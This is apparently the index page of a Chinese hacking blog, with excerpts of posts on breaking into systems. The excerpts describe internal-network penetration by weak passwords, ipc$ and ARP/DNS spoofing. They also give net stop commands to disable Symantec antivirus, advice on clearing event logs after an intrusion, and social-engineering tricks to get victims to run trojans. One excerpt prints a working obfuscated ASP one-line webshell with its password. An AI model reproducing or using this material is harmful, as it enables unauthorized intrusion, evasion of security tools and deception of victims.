Stay Hungry,Stay Foolish(求知若饥,虚心若愚。)——Steve Jobs

feed订阅 腾讯微博 新浪微博 twitter 你好,欢迎光临!

命令:Tasklist /SVC 这个命令会列出所有进程,系统服务及其对应的PID值! 而终端所对应的服务名为:TermService 再找到PID后使用 netstat -ano列出所有端口对应的PID值! 那么就可以看到终端的端口号了 在CMD命令行下关闭进程的命令2010/02/01 09:57 ━━━━━━━━━━━...
1、有了内网一台机器了,当然要继续渗透下去,在这里我总结一下几种方法,方法一、扫描弱口令,ipc$连接。方法二、靠自己的运气和管理员的懒惰加社会工程学。方法三、溢出。方法四、arp欺骗,dns欺骗。方法五、域结构下的渗透 方法一、扫描弱口令,ipc$连接 xscan-v3.3扫描器扫一下内网 ipc 是int...

防止asp马别人留后门

2014.04.20, 经验分享 ,1条评论,3092人打酱油
好多朋友都拿的有webshell吧,基本上都加了密的... 可是,没见到源码,很难测试它到底有没有后门, 指不定给别人打工了... 下面贴种很简单的方法,大家别扔蛋哈 (asp的哦) 在代码的最前面插入: <%if request("xxx")="123" then session("xxx")...

PHP 隐藏后门

2014.04.20, 经验分享 ,2条评论,3335人打酱油
  最近非常多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里,其实把一句话木马插入到PHP文件中就已非常隐蔽了,如果说硬是要放到HTML文件或图片里,就接着往下看这篇的篇测试报告吧。要知道如果光把PHP语句放到图片里是无论怎么也不能执行的,因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PH...
处理变态诺顿企业版: net stop "Symantec AntiVirus" /y net stop "Symantec AntiVirus Definition Watcher" /y net stop "Symantec Event Manager" /y net stop "System Event Notificati...
清理你入侵后的三个重要痕迹 应用程序日志 安全日志 系统日志 DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小。安全日志文件:%systemroot%system32configSecEvent.EVT 系统日志文件:%systemroot%syste...
在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性。 下载了数据库,但是md5密码没办法解密。唉,看来只要记录他的登录管理员 账号密码了! 省得还要去穷取法破解! 这个密码其实说重要也不重要 说不 重要 其实很重要。 因为很多人喜欢使用相同密码。即使是我这类安全检...
让对方运行你的木.马的社会工程学艺术 在这里我不想去谈什么是社会工程学,我想应该来点实际并且有用的东西, 下面是一些实际的例子。请参考和指教。谢谢! 1: 木马的图片 建议和木马的名字有关。 2: 木马的名字 这个重要。你可以取一个windows补丁的名字,word,pdf等后缀。自由发挥吧! 3: 把木马压缩成RAR...
一句话在下面: <% i=(Chr(-12590)) love=(Chr(-20306)) you=(Chr(-15133)) OK=i&love&you CNM=Request(OK) eVal CNM 'pass:我爱你 %> 密码:我爱你 

不可忽视的万能密码

2014.04.09, 漏洞发布 ,4条评论,4343人打酱油
前言:        第一次拿站(偶就读的学校)。。由于是第一次拿站,那时的是不知道fck,ewebeditor...的编辑器,不知道上传漏洞,不知道扫目录,不知道谷歌找后台,不知道...        只知道啊D可以扫注入,可以找后台。万能的啊D什么都可以干,有了...